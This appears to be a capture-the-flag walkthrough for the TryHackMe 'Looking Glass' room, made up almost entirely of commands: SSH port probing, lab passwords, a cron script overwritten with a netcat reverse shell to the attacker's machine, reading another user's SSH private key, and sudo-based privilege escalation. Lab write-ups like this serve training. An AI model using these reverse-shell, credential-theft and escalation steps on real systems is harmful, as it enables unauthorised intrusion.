Looking Glass

Room Link: https://tryhackme.com/room/lookingglass

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Same as the first scan, a lot of ssh ports open

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/22 - SSH

Kali

Kali

nmap -A $VICTIM -oN results.txt
grep -oE '^[0-9]+/' results.txt > num.txt
cat num.txt

Kali

cat num.txt |  tr -d '\n' | sed 's/\//,/g' | tr -d ' '

Kali

for port in 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783; do
    echo "connecting to port $port"; ssh -o 'LogLevel=ERROR' -o 'StrictHostKeyChecking=no' -p $port test@$VICTIM;done

Kali

for i in $(seq 12345 13465); do echo "connecting to port $i"; ssh -o 'LogLevel=ERROR' -o 'StrictHostKeyChecking=no' -p $i $VICTIM;done | grep -vE 'Lower|Higher'
Key: thealphabetcipher

Kali

ssh $VICTIM -p 12350
Password: bewareTheJabberwock

Initial Access

Kali

ssh jabberwock@$VICTIM 
Password: PlaceThanksSelfishGrinned

Victim

sudo -l

Victim

cat /etc/crontab

Victim

cd /home/jabberwock
vi twasBrillig.sh

twasBrillig.sh

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc $KALI 1337 >/tmp/f

Kali

nc -lvnp 1337

Victim

sudo /sbin/reboot

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim(tweedledee)

cd /home/tweedledee
cat humptydumpty.txt

Victim(tweedledee)

sudo -l
sudo -u tweedledum /bin/bash

Victim(tweedledum)

cd /home/tweedledum/
cat humptydumpty.txt

Victim(tweedledum)

su humptydumpty
Password: zyxwvutsrqponmlk

I can get into alice's folder but I can't actually ls and see files, but I tried looking at files that are usually there and I found her id_rsa key.

Victim(humptydumpty)

cd /home/alice
cat .ssh/id_rsa

Copy key to Kali

Kali

chmod 600 id_rsa 
ssh alice@$VICTIM -i id_rsa

Privilege Escalation

LinPeas

Kali

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81

Victim(alice)

cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh

Victim(alice)

cat /etc/sudoers.d/alice 
sudo -h ssalg-gnikool -l
sudo -h ssalg-gnikool /bin/bash

PreviousOllieNextVulnNet

Last updated